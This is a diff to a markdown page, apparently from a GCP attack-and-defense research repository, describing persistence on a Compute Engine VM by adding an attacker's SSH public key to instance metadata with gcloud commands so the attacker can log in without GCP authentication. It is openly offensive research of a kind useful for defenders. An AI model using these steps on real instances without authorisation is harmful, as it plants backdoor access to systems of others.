anrbn/GCP-Attack-Defense/research/Google Cloud/Compute Engine/Persistance-via-SSH-Key-Addition.md

     This will generate a Private Key `(~/.ssh/id_rsa)` and a Public Key `(~/.ssh/id_rsa.pub)`.

 2. Add the Public SSH key to the Instance metadata of the VM.

-    ```powershell
+Just like Project-wide Metadata, adding Public Keys to Instance Metadata is not that straight forward, one needs to follow certain steps to upload it.
+The steps are listed below.

+    - Check Existing SSH Keys in Instance Metadata

+      Before adding a new SSH key, it's essential to check for existing keys in your Instance metadata.
+If you don't include these existing keys when adding a new one, they will be erased.

+      Run the following command to list existing SSH keys:

+      ```bash
+      gcloud compute instances describe [INSTANCE-NAME] --zone [ZONE]
+      ```

+      Copy the output and save it into a text file, let's call it `sshkeys.txt`.

+    - Generate a New SSH Key Pair

+      ```bash
+      ssh-keygen -t rsa -C [USERNAME] -b 2048
+      ```

+      This will generate a new SSH key, saving it in the `.ssh/id_rsa` file within the user directory.

+    - Append the New SSH Key to `sshkeys.txt`

+      Open the newly generated public key file, usually located at `~/.ssh/id_rsa.pub`, and copy its contents.

+      Open `sshkeys.txt` and append the new key at the end of the file in the following format:

+      ```bash
+      [USERNAME]:<copied_public_key>
+      ```

+    - Update Instance Metadata with New SSH Keys

+      Now that `sshkeys.txt` contains all the SSH keys (both existing and new), the Instance's Metadata can now be updated.

+      ```bash
-    gcloud compute instances add-metadata INSTANCE_NAME --metadata-from-file ssh-keys=~/.ssh/id_rsa.pub
+      gcloud compute instances add-metadata [INSTANCE-NAME] --metadata-from-file ssh-keys="sshkeys.txt" --zone [ZONE]
       ```

 3. The Attacker can now login to the Instance without needing to authenticate to GCP or have access to a valid User / Service Account..